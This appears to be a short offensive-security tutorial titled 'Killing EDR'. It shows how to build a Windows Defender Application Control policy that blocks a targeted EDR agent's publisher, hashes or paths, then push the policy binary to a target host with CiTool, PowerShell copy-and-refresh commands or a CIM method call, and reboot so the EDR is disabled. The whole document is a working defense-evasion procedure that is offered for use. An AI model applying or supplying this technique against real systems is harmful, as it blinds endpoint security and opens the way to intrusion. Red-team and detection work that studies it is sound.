Windows Defender Application Control (WDAC): Killing EDR

1. Setup Your Environement

On a fresh installed Windows Virtual machine, we will install:

• Dotnet 8 SDK

• WDAC Wizzard

• The targetted EDR Agent

2. Create a WDAC Policy

When all setup, we can start creating an EDR-Blocking WDAC Policy using the WDAC Wizzard utility:

1. Select "Policy Editor"

1. Select the "AllowAll" template from C:\Windows\Schemas\CodeIntgrity\ExamplePolicies\AllowAll.xml and click "Next"

1. Ensure that "Audit Mode" is Unchecked, click "Next"

1. Click "Add Custom"

1. Specify conditions on the targeted EDR Publisher, executable/drivers hashes, Product Name, or even Paths.

1. When done, wait for the WDAC Policy to build. It will create an XML and PolicyBinary file.

3. Apply the WDAC Policy

We can now upload the previously build PolicyBinary file to a target host, and apply it using below command lines:

# Windows 11 22H2 and above
CiTool --update-policy C:\Path\To\{Policy}.cip

# Windows 11, Windows 10 version 1903 and above, 
# And Windows Server 2022 and above
$PolicyBinary = "C:\Path\To\{Policy}.cip"
$DestinationFolder = $env:windir+"\System32\CodeIntegrity\CIPolicies\Active\"
$RefreshPolicyTool = "<Path where RefreshPolicy.exe can be found from managed endpoints>"
Copy-Item -Path $PolicyBinary -Destination $DestinationFolder -Force
& $RefreshPolicyTool

# All other versions of Windows and Windows Server
$PolicyBinary = "C:\Path\To\{Policy}.cip"
$DestinationBinary = $env:windir+"\System32\CodeIntegrity\SiPolicy.p7b"
Copy-Item  -Path $PolicyBinary -Destination $DestinationBinary -Force
Invoke-CimMethod -Namespace root\Microsoft\Windows\CI -ClassName PS_UpdateAndCompareCIPolicy -MethodName Update -Arguments @{FilePath = $DestinationBinary}

4. Reboot

After reboot, (and maybe several tests to identify which process/driver to block) the EDR should be now disabled.